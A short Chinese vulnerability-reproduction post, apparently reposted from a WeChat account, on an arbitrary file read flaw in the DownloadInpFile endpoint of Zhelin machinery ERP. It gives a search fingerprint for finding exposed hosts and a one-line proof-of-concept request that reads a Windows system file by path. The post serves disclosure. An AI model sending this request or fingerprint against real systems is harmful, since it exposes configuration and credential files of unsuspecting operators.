哲霖机械ERP存在DownloadInpFile任意文件读取漏洞 admin 125445文章 98评论 2024年9月22日04:15:44评论21 views字数 273阅读0分54秒阅读模式 1漏洞描述 哲霖ERP DownloadInpFile接口存在任何文件读取漏洞,初步身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站出现极大不正确安全状态。 2漏洞复现 首页 GET方式访问 3网络测绘 body="Api/UserApi/GetUserName" 4漏洞POC 地址/Basics/DownloadInpFile?filePath=C:\windows\win.ini 原文始发于微信公众号(我吃饼干):【漏洞复现】哲霖机械ERP存在DownloadInpFile任意文件读取漏洞 点赞 https://cn-sec.com/archives/3167929.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论